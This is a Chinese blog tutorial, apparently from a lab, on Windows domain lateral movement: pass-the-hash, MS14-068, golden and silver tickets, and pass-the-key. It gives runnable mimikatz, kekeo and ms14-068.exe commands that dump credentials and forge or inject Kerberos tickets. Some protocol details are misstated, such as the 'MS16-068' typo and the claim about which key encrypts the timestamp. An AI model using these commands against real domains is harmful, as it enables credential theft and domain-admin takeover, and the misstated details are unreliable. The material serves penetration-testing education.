内网渗透之PTH&PTT&PTK

于 2025-03-19 17:42:57 发布
阅读量975 收藏 9
点赞数 24
分类专栏: 内网学习 文章标签: 网络 威胁分析 HW 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/kui576/article/details/146373091
版权

文章目录

内网渗透之PTH&PTT&PTK

PTH(pass-the-hash)

pass-the-hash在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务,而不用提供明文密码。

pass the hash原理:

  • 在Windows系统中,通常会使用NTLM身份认证
  • NTLM认证不使用明文口令,而是使用口令加密后的hash值,hash值由系统API生成(例如LsaLogonUser)
  • hash分为LM hash和NT hash,如果密码长度大于15,那么无法生成LM hash。从Windows Vista和Windows Server 2008开始,微软默认禁用LM hash
  • 如果攻击者获得了hash,就能够在身份验证的时候模拟该用户(即跳过调用API生成hash的过程)

这类攻击适用于:

  • 域/工作组环境
  • 可以获得hash,但是条件不允许对hash爆破
  • 内网中存在和当前机器相同的密码

微软也对pth打过补丁,然而在测试中发现,在打了补丁后,常规的Pass The Hash已经无法成功,唯独默认的Administrator(SID 500)账号例外,利用这个账号仍可以进行Pass The Hash远程ipc连接。

如果禁用了ntlm认证,PsExec无法利用获得的ntlm hash进行远程连接,但是使用mimikatz还是可以攻击成功。

从windows到windows横向pth这一类攻击方法比较广泛

PTT(pass the ticket)

ptt攻击的部分就不是简单的NTLM认证了,它是利用Kerberos协议进行攻击的,这里就介绍三种常见的攻击方法:MS16-068,Golden ticket,SILVER ticket。

Kerberos协议

Kerberos协议具体工作方法,在域中,简要介绍一下:

  • 客户机将明文密码进行NTLM哈希,然后和时间戳一起加密(使用krbtgt密码hash作为密钥),发送给kdc(域控),kdc对用户进行检测,成功之后创建TGT(Ticket-Granting
    Ticket)
  • 将TGT进行加密签名返回给客户机器,只有域用户krbtgt才能读取kerberos中TGT数据
  • 然后客户机将TGT发送给域控制器KDC请求TGS(票证授权服务)票证,并且对TGT进行检测
  • 检测成功之后,将目标服务账户的NTLM以及TGT进行加密,将加密后的结果返回给客户机。

ms14-068

MS14-068是密钥分发中心(KDC)服务中的Windows漏洞。它允许经过身份验证的用户在其Kerberos票证(TGT)中插入任意PAC(表示所有用户权限的结构)。该漏洞位于kdcsvc.dll域控制器的密钥分发中心(KDC)中。用户可以通过呈现具有改变的PAC的Kerberos TGT来获得票证.

ms14-068详细介绍:https://www.freebuf.com/vuls/56081.html

简单来说就是:

windows域中使用kerberos协议过程中,为了让SS服务器判断Client是否有权限访问服务,引入了PAC机制。构造PAC也是这个漏洞的根本。

  1. 在请求AS时,将require_PAC设置成False。
  2. 在请求TGS时,构造PAC,然后使用MD5签名(PAC尾部的签名算法可以任意指定),PAC并没有放在TGT中发送,而是在请求包的其他位置(但是还是可以解析)。
  3. TGS_REP返回的不是会话密钥,而是返回的带PAC的TGT(微软的锅)

造成的危害是允许域内任何一个普通用户,将自己提升至域管权限。微软给出的补丁是kb3011780

下面来介绍一下ms14-068的利用过程:

1.使用 whoami/user 得到普通域用户的sid
在这里插入图片描述2.执行payload生成TGT票据:
利用工具:ms14-068
使用方法:

ms14-068.exe -u 域成员名@域名 -s 域成员sid -d 域控制器地址 -p 域成员密码

运行实例:

MS14-068.exe -u mary@god.org -s S-1-5-21-1218902331-2157346161-1782232778-1124 -d 192.168.3.21 -p admin!@#45

如果操作正确,且域机器是可以和域控制器互通则会创建".ccache"文件

在这里插入图片描述3.票据注入:
使用mimikatz将票据注入到当前内存中,伪造凭证,如果成功则拥有域管理权限,可任意访问域中所有机器

mimikatz # kerberos::purge         //清空当前机器中所有凭证,如果有域成员凭证会影响凭证伪造
mimikatz # kerberos::list          //查看当前机器凭证
mimikatz # kerberos::ptc 票据文件   //将票据注入到内存中

在这里插入图片描述显示Injecting ticket : OK就表示注入成功了~

4.查看注入是否成功并且登录域控:

查看klist:

在这里插入图片描述发现已经将凭证注入进去了~下面可以使用net use进行登录,或者使用psexec,wmi等方法进行远程执行命令。注意,这里登录时,要使用机器名,不要使用IP,否则没办法攻击成功。

在这里插入图片描述可以看到我们已经提升到域控权限。

kekeo(制作票据具体看文档使用)

注意:(这里用普通用户权限达到域控权限是因为有ms14068这个漏洞存在)
考虑到mimikatz的pth功能需要本地管理员权限,所以mimikatz也提供了不需要管理员权限的解决方法Pass-The-Ticket(ptt)
Pass-The-Ticket需要用到gentilkiwi开源的另一款工具kekeo,下载地址:https://github.com/gentilkiwi/kekeo/releases

kekeo "tgt::ask /user:mary /domain:god.org /ntlm:518b98ad4178a53695dc997aa02d455c"

在这里插入图片描述
执行后生成票据 :

TGT_mary@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi

接下来导入票据:

kekeo "kerberos::ptt TGT_mary@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi"

在这里插入图片描述成功获得了域控的访问权限:

在这里插入图片描述

Golden ticket(黄金票据)(权限维持)

Golden ticket的作用是可以生成任意用户的tgt,那么问题就来了,是什么条件能够让他生成任意用户的tgt呢?还得要看kerberos认证的过程,在windows认证过程中,客户端将自己的信息发送给KDC,然后KDC使用krbtgt用户密码的hash作为密钥进行加密,生成TGT。

那么如果获取到了krbtgt的密码hash值,是不是就可以伪造任意tgt了。因为krbtgt只有域控制器上面才有,所以使用黄金凭据意味着你之前拿到过域控制器的权限,黄金凭据可以理解为一个后门

伪造黄金凭据需要具备下面条件:

  • krbtgt用户的hash(就意味着你已经有域控制器权限了)
  • 域名称
  • 域的SID值
  • 要伪造的用户名

先登录域控制器,dump krbtgt用户的hash值,获取域sid:

privilege::debug

lsadump::lsa /patch

在这里插入图片描述
切换到普通域用户的机器,生成TGT凭证,用户名为administrator:
在这里插入图片描述然后使用mimikatz将凭证注入进去,攻击成功:

mimikatz # kerberos::ptt test.kirbi

在这里插入图片描述
如果主机开启了RPC服务,还可以使用WmiExec.vbs直接连接:

在这里插入图片描述

Silver ticket(白银票据)

silver ticket和golden ticket不同的是,它不需要和域控制器进行通信,原理是伪造TGS,使用的是计算机账户的hash进行加密的,所以只能访问指定的权限。

不像是Golden ticket,是由krgtgt用户的密码hash进行加密,伪造tgt可以获取到所有权限。

白银票据这里只是对单一的服务进行授权,利用过程和golden ticket差不多,首先上域控制器中,把机器的ntlm hash(rc4加密) dump下来,然后在普通域用户机器进行伪造权限,进行ptt.

1.首先登录域控,dump机器hash

privilege::debug
sekurlsa::logonpasswords

在这里插入图片描述2.将hash保存下来,在普通域用户机器中进行ptt

kerberos::golden /domain:god.org /sid:S-1-5-21-1218902331-2157346161-1782232778  /target:192.168.3.21 /rc4:8432d4fa4430ecf56927dbabd1b4d36b  /service:cifs /user:mary /ptt

在这里插入图片描述
这里的cifs是指的文件共享服务,有了cifs服务权限,就可以访问域控制器的文件系统:

在这里插入图片描述

密钥传递攻击(PTK)

条件:

  • 打了kb2871997补丁
  • 禁用NTML
  • 获取用户的aes key:

演示:

获取用户的aes key:

mimikatz "privilege::debug" "sekurlsa::ekeys"

在这里插入图片描述
注入aes key:

mimikatz "privilege::debug" "sekurlsa::pth /user:mary /domain:god.org /aes256:c4388a1fb9bd65a88343a32c09e53ba6c1ead4de8a17a442e819e98c522fc288"

在这里插入图片描述
成功注入aes256,尝试远程连接:
在这里插入图片描述如果拒绝访问的话尝试安装kb2871997补丁

红队内网攻防渗透内网渗透内网对抗:横向移动篇&PTH哈希&PTT票据&PTK密匙&Kerberoast攻击点&TGT&NTLM爆破
HACKONE的博客
06-23 354
请求的Kerberos服务票证的加密类型是RC4_HMAC_MD5,这意味着服务帐户的NTLM密码哈希用于加密服务票证。生成票据文件:shell ms14-068.exe -u webadmin@god.org -s S-1-5-21-1218902331-2157346161-1782232778-1132 -d 192.168.3.21 -p admin!PTH(pass the hash) #利用的lm或ntlm的值进行的渗透测试(NTLM认证攻击)
内网安全 - 域横向 PTH&PTK&PTT
acepanhuan的博客
03-16 502
内网安全 - 域横向 PTH&PTK&PTT
内网安全(四)---横向渗透:PTH&PTK&PTT
qi_SJQ_的博客
02-11 4571
域横向 PTH&PTK&PTT 哈希票据传递 1.知识: PTH(pass the hash) : 利用 lm 或 ntlm 的值。 PTT(pass the ticket): 利用的票据凭证 TGT 。 PTK(pass the key) : 利用的 ekeys 、aes256 。 1)PTH: PTH 在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过 LM Hash 和 NTLM Hash 访问远程主机或服务,而不用提供明文密码。 如果禁用了 ntlm 认证,
5.内网渗透PTH&PTT&PTK
weixin_30791095的博客
02-08 1459
---------------------------------------------- 本文参考自三好学生-域渗透系列文章 内网渗透之PTH&PTT&PTK PTH(pass-the-hash) pass-the-hash在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务,而不用提供明文密码。...
内网渗透-PTH&PTT&PTK
G208_522的博客
10-26 1338
内网渗透系列
内网渗透之PPT票据传递攻击(Pass the Ticket)
qq_53742230的博客
07-31 2065
内网渗透之票据传递攻击
内网域横向PTH&PTK&PTT哈希票据传递
mingyqf的博客
11-12 4444
内网域横向PTH&PTK&PTT哈希票据传递 Kerberos 协议具体工作方法,在域中,简要介绍一下:  客户机将明文密码进行 NTLM 哈希,然后和时间戳一起加密(使用 krbtgt 密码 hash 作为密钥),发送给 kdc(域控),kdc 对用户进行检 测,成功之后创建 TGT(Ticket-Granting Ticket)  将 TGT 进行加密签名返回给客户机器,只有域用户 krbtgt 才能读 取 kerberos 中 TGT 数据  然后客户机将 TGT 发送给域控
第68天:内网安全-域横向PTH&PTK&PTT哈希票据传递1
08-03
内网安全是一个重要的议题,尤其是在企业环境中,域横向PTH、PTK、PTT哈希票据传递是其中的关键攻击手段。这些方法主要针对Kerberos协议的弱点,利用NTLM哈希、Kerberos票据和AES密钥来绕过认证过程,从而在内部网络...
第68天-内网安全-域横向 PTH&PTK&PTT 哈希票据传
MCTSOG的博客
05-18 984
思维导图 知识点 Kerberos 协议 具体工作方法,在域中,简要介绍一下: 客户机将明文密码进行 NTLM 哈希,然后和时间戳一起加密(使用krbtgt 密码 hash 作为密钥),发送给 kdc(域控),kdc 对用户进行检测,成功之后创建 TGT(Ticket-Granting Ticket) 将 TGT 进行加密签名返回给客户机器,只有域用户 krbtgt 才能读 取 kerberos 中 TGT 数据 然后客户机将 TGT 发送给域控制器 KDC 请求 TGS(票证授权服务)票证,并且对
内网安全】横向移动-PTH哈希-PTT票据-PTK密钥
qq_55349490的博客
07-19 1235
pass the hash(哈希传递攻击,简称pth)pass the ticket(票据传递攻击,简称ptt)pass the key(密钥传递攻击,简称ptk)PTH(pass the hash) 利用的lm或ntlm的值进行的渗透测试(NTLM认证攻击)PTK(pass the key) 利用的ekeys aes256进行的渗透测试(NTLM认证攻击)PTT(pass the ticket) 利用的票据凭证TGT进行渗透测试(Kerberos认证攻击)
内网渗透—横向移动&PTH横移&PTK横移&PTT横移
2301_76227305的博客
08-11 1368
在用户登录计算机时,用户的账号密码都是通过加密,以hash的方式存储在计算机中的。而这中加密方式一般是不可逆的算法,当用户想要登陆计算机成功,那么计算机就会对用户的密码进行hash处理,同时与数据库内的hash进行对比,倘若正确,那么便成功登录。Windows中用户账户密码加密的hash分为两种,分别是LM Hash和NTLM Hash。在Windows Server2012之前用的是LM和NTLM,但在2012以及之后都是只用NTLM了。
内网渗透PTH(pass-the-hash)
https://www.cnblogs.com/zpchcbd/
09-11 1742
pass-the-hash在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务,而不用提供明文密码。 pass the hash原理: 在Windows系统中,通常会使用NTLM身份认证,NTLM认证不使用明文口令,而是使用口令加密后的hash值,hash值由系统API生成(例如LsaLogonUser) ,其中hash(哈希)分为...
哈希传递PTH、密钥传递PTT、票据传递PTK的实现和比较
weixin_45715461的博客
06-05 1635
哈希传递PTH、密钥传递PTT、票据传递PTK的实现和比较
内网安全:PTH PTK PTT
qq_61553520的博客
01-28 1752
​​​​​​​。
内网安全-域横向PTH&PTK&PTT哈希票据传递
xhscxj的博客
03-14 1166
PTH(pass the hash) #利用 lm 或 ntlm 的值进行的渗透测试 PTT(pass the ticket) #利用的票据凭证 TGT 进行的渗透测试 PTK(pass the key) #利用的 ekeys aes256 进行的渗透测试 案例 1-域横向移动 PTH 传递-mimikatz PTH ntlm 传递 未打补丁下的工作组及域连接: sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20.
内网安全之域横向 PTH、PTK、PTT 哈希票据传递
最新发布
m0_57836225的博客
11-14 604
PTH 是一种在内网安全中用于域横向移动的技术。它利用获取到的用户账户密码哈希值,在无需知道明文密码的情况下,尝试在域内其他主机上进行身份验证。在 Windows 系统中,很多认证环节是基于密码哈希的。例如,攻击者通过漏洞利用或其他手段获取了某台被攻破主机上用户的哈希值后,就可以利用 PTH 在域内其他受信任主机上尝试获取相同权限,以此实现横向移动。PTK 与 PTH 类似,不过它是基于密钥相关信息来实现的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

kui954

感谢各位的支持o(* ̄3 ̄)o

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值